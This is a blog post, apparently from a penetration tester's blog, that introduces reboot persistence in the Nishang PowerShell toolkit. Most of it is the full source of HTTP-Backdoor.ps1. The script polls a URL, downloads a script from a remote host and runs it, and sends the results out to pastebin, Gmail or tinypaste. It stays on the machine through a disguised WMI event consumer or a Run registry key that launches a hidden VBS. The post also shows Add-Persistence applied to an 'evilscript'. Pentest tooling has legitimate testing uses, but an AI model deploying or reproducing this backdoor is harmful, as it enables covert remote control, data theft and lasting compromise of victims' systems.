Persistence - Powerpreter and Nishang 0.3.2 - Part 3

This is the third post in the series about Powerpreter and Nishang.

You can read the first two parts here:
(Introducing) Powerpreter and Nishang 0.3.0 : Easy post exploitation using powershell - Part 1
Pivoting to and poking other computers using powershell - Powerpreter and Nishang 0.3.1 - Part 2

Finally, I am back to blogging after few months. Hoping to resume the earlier frequency of writing :)

Many users wanted persistence for some payloads in Nishang. With this release, Reboot Persistence has been introduced for backdoors, keylogger and powerpreter. Scripts Add-Persistence and Remove-Persistence have also been added. Also, from this release, scripts in Nishang have been arranged in separate folders according to usage. Do let me know if you liked the change.

Persistence in Nishang uses WMI Permanent Event Consumers when used with Administrative privileges (elevated shell) and vanila Run Registry key otherwise. For WMI thingy, this Technet article helped me a lot. From 0.3.2 backdoors - HTTP-Backdoor, DNS_TXT_Pwnage and Execute-OnTime, Keylogger and Powerpreter will have this option.

For example, this is how persistence could be used for HTTP-Backdoor

 PS > .\HTTP-Backdoor.ps1 -persist 

The -persist parameter could be used with any of the above listed payloads.

The code for HTTP-Backdoor.ps1 is:

<#<br>.SYNOPSIS<br>Nishang Payload which queries a URL for instructions and then downloads and executes a powershell script.<br><br>.DESCRIPTION<br>This payload queries the given URL and after a suitable command (given by MagicString variable) is found, <br>it downloads and executes a powershell script. The payload could be stopped remotely if the string at CheckURL matches<br>the string given in StopString variable. By using the exfile parameter, it would be possible to <br><br>.PARAMETER CheckURL<br>The URL which the payload would query for instructions.<br><br>.PARAMETER PayloadURL<br>The URL from where the powershell script would be downloaded.<br><br>.PARAMETER MagicString<br>The string which would act as an instruction to the payload to proceed with download and execute.<br><br>.PARAMETER StopString<br>The string which if found at CheckURL will stop the payload.<br><br>.PARAMETER persist<br>Use this parameter to achieve reboot persistence. Different methods of persistence with Admin access and normal user access.<br><br>.PARAMETER exfil<br>Use this parameter to use exfiltration methods for returning the results.<br><br>.PARAMETER dev_key<br>The Unique API key provided by pastebin when you register a free account.<br>Unused for tinypaste.<br>Unused for gmail option.<br><br>.PARAMETER username<br>Username for the pastebin account where data would be pasted.<br>Username for the tinypaste account where data would be pasted.<br>Username for the gmail account where attachment would be sent as an attachment.<br><br>.PARAMETER password<br>Password for the pastebin account where data would be pasted.<br>Password for the tinypaste account where data would be pasted.<br>Password for the gmail account where data would be sent.<br><br>.PARAMETER keyoutoption<br>The method you want to use for exfitration of data.<br>"0" for displaying on console<br>"1" for pastebin.<br>"2" for gmail<br>"3" for tinypaste   <br><br>.Example<br><br>PS > .\HTTP-Backdoor.ps1<br><br>The payload will ask for all required options.<br><br>.EXAMPLE<br>PS > .\HTTP-Backdoor.ps1 http://pastebin.com/raw.php?i=jqP2vJ3x http://pastebin.com/raw.php?i=Zhyf8rwh start123 stopthis<br><br>Use above when using the payload from non-interactive shells.<br><br>.EXAMPLE<br>PS > .\HTTP-Backdoor.ps1 http://pastebin.com/raw.php?i=jqP2vJ3x http://pastebin.com/raw.php?i=Zhyf8rwh start123 stopthis -exfil <devkey><username><password><keyoutoption><br><br>Use above command for using exfiltration methods.<br><br><br>.EXAMPLE<br>PS > .\HTTP-Backdoor.ps1 -persist<br><br>Use above for reboot persistence.<br><br>.LINK<br>http://labofapenetrationtester.blogspot.com/<br>http://code.google.com/p/nishang<br>#><br><br><br>[CmdletBinding(DefaultParameterSetName="noexfil")]<br>Param( [Parameter()] [Switch] $persist,<br>[Parameter(Parametersetname="exfil")] [Switch] $exfil,<br>[Parameter(Position = 0, Parametersetname="exfil")] [Parameter(Position = 0, Mandatory = $True, Parametersetname="noexfil")] [String] $CheckURL,<br>[Parameter(Position = 1, Parametersetname="exfil")] [Parameter(Position = 1, Mandatory = $True, Parametersetname="noexfil")] [String]$PayloadURL,<br>[Parameter(Position = 2, Parametersetname="exfil")] [Parameter(Position = 2, Mandatory = $True, Parametersetname="noexfil")] [String]$MagicString,<br>[Parameter(Position = 3, Parametersetname="exfil")] [Parameter(Position = 3, Mandatory = $True, Parametersetname="noexfil")] [String]$StopString,<br>[Parameter(Position = 4,Mandatory = $True, Parametersetname="exfil")] [String]$dev_key,<br>[Parameter(Position = 5,Mandatory = $True, Parametersetname="exfil")] [String]$username,<br>[Parameter(Position = 6,Mandatory = $True, Parametersetname="exfil")] [String]$password,<br>[Parameter(Position = 7,Mandatory = $True, Parametersetname="exfil")] [String]$keyoutoption )<br><br><br>function HTTP-Backdoor<br>{<br>    $body = @'<br>function HTTP-Backdoor-Logic ($CheckURL, $PayloadURL, $MagicString, $StopString, $dev_key, $username, $password, $keyoutoption, $exfil) <br>{<br>    while($true)<br>    {<br>    $exec = 0<br>    start-sleep -seconds 5<br>    $webclient = New-Object System.Net.WebClient<br>    $filecontent = $webclient.DownloadString("$CheckURL")<br>    if($filecontent -eq $MagicString)<br>    {<br>        $webclient = New-Object System.Net.WebClient<br>        $file1 = "$env:temp\payload.ps1"<br>        $webclient.DownloadFile($PayloadURL,"$file1")<br>        $pastevalue = Invoke-Expression $file1<br>        $exec++<br>        if ($exfil -eq $True)<br>        {<br>           $pastename = $env:COMPUTERNAME + " Results of HTTP Backdoor: "<br>           Do-Exfiltration "$pastename""$pastevalue""$username""$password""$dev_key""$keyoutoption"<br>        }<br>        if ($exec -eq 1)<br>        {<br>            Start-Sleep -Seconds 60<br>        }<br>    }<br>    elseif ($filecontent -eq $StopString)<br>    {<br>        break<br>    }<br>    }<br>}<br>'@<br><br><br>$exfiltration = @'<br>function Do-Exfiltration($pastename,$pastevalue,$username,$password,$dev_key,$keyoutoption,$filename)<br>    {<br>        function post_http($url,$parameters) <br>        { <br>            $http_request = New-Object -ComObject Msxml2.XMLHTTP <br>            $http_request.open("POST", $url, $false) <br>            $http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded") <br>            $http_request.setRequestHeader("Content-length", $parameters.length); <br>            $http_request.setRequestHeader("Connection", "close") <br>            $http_request.send($parameters) <br>            $script:session_key=$http_request.responseText <br>        } <br><br>        function Get-MD5()<br>        {<br>            #http://stackoverflow.com/questions/10521061/how-to-get-a-md5-checksum-in-powershell<br>            $md5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider<br>            $utf8 = new-object -TypeName System.Text.UTF8Encoding<br>            $hash = [System.BitConverter]::ToString($md5.ComputeHash($utf8.GetBytes($password))).Replace("-", "").ToLower()<br>            return $hash<br>        }<br><br>        elseif ($keyoutoption -eq "1")<br>        {<br>            $utfbytes  = [System.Text.Encoding]::UTF8.GetBytes($pastevalue)<br>            $pastevalue = [System.Convert]::ToBase64String($utfbytes)<br>            post_http "https://pastebin.com/api/api_login.php""api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password"<br>            post_http "https://pastebin.com/api/api_post.php""api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2"<br>        }<br><br>        elseif ($keyoutoption -eq "2")<br>        {<br>            #http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage<br>            $smtpserver = “smtp.gmail.com”<br>            $msg = new-object Net.Mail.MailMessage<br>            $smtp = new-object Net.Mail.SmtpClient($smtpServer )<br>            $smtp.EnableSsl = $True<br>            $smtp.Credentials = New-Object System.Net.NetworkCredential(“$username”, “$password”); <br>            $msg.From = “$username@gmail.com”<br>            $msg.To.Add(”$username@gmail.com”)<br>            $msg.Subject = $pastename<br>            $msg.Body = $pastevalue<br>            if ($filename)<br>            {<br>                $att = new-object Net.Mail.Attachment($filename)<br>                $msg.Attachments.Add($att)<br>            }<br>            $smtp.Send($msg)<br>        }<br><br>        elseif ($keyoutoption -eq "3")<br>        {<br><br>            $hash = Get-MD5<br>            post_http "http://tny.cz/api/create.xml""paste=$pastevalue&title=$pastename&is_code=0&is_private=1&password=$dev_key&authenticate=$username`:$hash"<br>        }<br><br>    }<br>'@<br>    $modulename = $script:MyInvocation.MyCommand.Name<br>    if($persist -eq $True)<br>    {<br>        $name = "persist.vbs"<br>        $options = "HTTP-Backdoor-Logic $CheckURL $PayloadURL $MagicString $StopString"<br>        if ($exfil -eq $True)<br>        {<br>            $options = "HTTP-Backdoor-Logic $CheckURL $PayloadURL $MagicString $StopString $dev_key $username $password $keyoutoption $exfil"<br>        }<br>        Out-File -InputObject $body -Force $env:TEMP\$modulename<br>        Out-File -InputObject $exfiltration -Append $env:TEMP\$modulename<br>        Out-File -InputObject $options -Append $env:TEMP\$modulename<br>        echo "Set objShell = CreateObject(`"Wscript.shell`")"> $env:TEMP\$name<br>        echo "objShell.run(`"powershell -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")">> $env:TEMP\$name<br>        $currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent()) <br>        if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -eq $true)<br>        {<br>            $scriptpath = $env:TEMP<br>            $scriptFileName = "$scriptpath\$name"<br>            $filterNS = "root\cimv2"<br>            $wmiNS = "root\subscription"<br>            $query = @"<br>             Select * from __InstanceCreationEvent within 30 <br>             where targetInstance isa 'Win32_LogonSession'<br>"@<br>            $filterName = "WindowsSanity"<br>            $filterPath = Set-WmiInstance -Class __EventFilter -Namespace $wmiNS -Arguments @{name=$filterName; EventNameSpace=$filterNS; QueryLanguage="WQL"; Query=$query}<br>            $consumerPath = Set-WmiInstance -Class ActiveScriptEventConsumer -Namespace $wmiNS -Arguments @{name="WindowsSanity"; ScriptFileName=$scriptFileName; ScriptingEngine="VBScript"}<br>            Set-WmiInstance -Class __FilterToConsumerBinding -Namespace $wmiNS -arguments @{Filter=$filterPath; Consumer=$consumerPath} |  out-null<br>        }<br>        else<br>        {<br>            New-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -PropertyType String -Value $env:TEMP\$name -force<br>            echo "Set objShell = CreateObject(`"Wscript.shell`")"> $env:TEMP\$name<br>            echo "objShell.run(`"powershell -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")">> $env:TEMP\$name<br>        }<br>    }<br>    else<br>    {<br>        $options = "HTTP-Backdoor-Logic $CheckURL $PayloadURL $MagicString $StopString"<br>        if ($exfil -eq $True)<br>        {<br>            $options = "HTTP-Backdoor-Logic $CheckURL $PayloadURL $MagicString $StopString $dev_key $username $password $keyoutoption $exfil"<br>        }<br>        Out-File -InputObject $body -Force $env:TEMP\$modulename<br>        Out-File -InputObject $exfiltration -Append $env:TEMP\$modulename<br>        Out-File -InputObject $options -Append $env:TEMP\$modulename<br>        Invoke-Expression $env:TEMP\$modulename<br>    }<br>}<br>HTTP-Backdoor<br></keyoutoption></password></username></devkey>

As visible in the above code, two files persist.vbs and HTTP-Backdoor.ps1 would be dropped in the TEMP directory of a user and a WMI permanent event consumer is created (by name of WindowsSanity) which launches persist.vbs on the user logon.I was unable to find a way to do this without dropping a file on the disk, suggestions are welcome on this.


For Powerpreter, the function Persistence could be used to achieve the same.

PS > Import-Module .\Powerpreter.psm1<br>PS > Persistence<br>

The Persistence function drops a copy of Powerpreter in User's TEMP directory and WMI events or Registry keys are created. On a reboot, Powerpreter is copied into the user's default $PSModulePath by the name of Update.psm1 which makes it directly usable (no Import-Module required) in Powershellv3. Note that one has to import the Update.psm1 module in Powershell v2 before using it. If the Update.psm1 is deleted by the user it will be copied back to $PSModulePath after a reboot.
The Peristence function in Powerpreter also has a HTTP based backdoor (works exaclty like the HTTP-Backdoor script).  An example.


And payload.txt contains call to
Aaand a calc pops up on the target!

Now, in case of the Keylogger, WMI method for persistence did not work. As the script is launched with the SYTEM privilege, keys for the user could not be logged by it. So the persistence method included in it is only using the Run registry key.

Ok, how about using the persistence thingy for any script? Add-Persistence could be used as below:

PS > .\Add-Persistence.ps1 -ScriptPath C:\evilscripts\evilscript.ps1

To check for the persistence, use the Remove-Persistence.ps1 script or Remove-Persistence function in powerpreter. Use with -remove option to clean.



That is all for this post. I am not sure if all would agree with calling this 'Persistence', but I found it useful anyway :)

Nishang could be downloaded from: http://code.google.com/p/nishang/source/browse/trunk

Hope you will find this useful too. As always I am looking forward for suggestions, feedback, bug reports and contributions.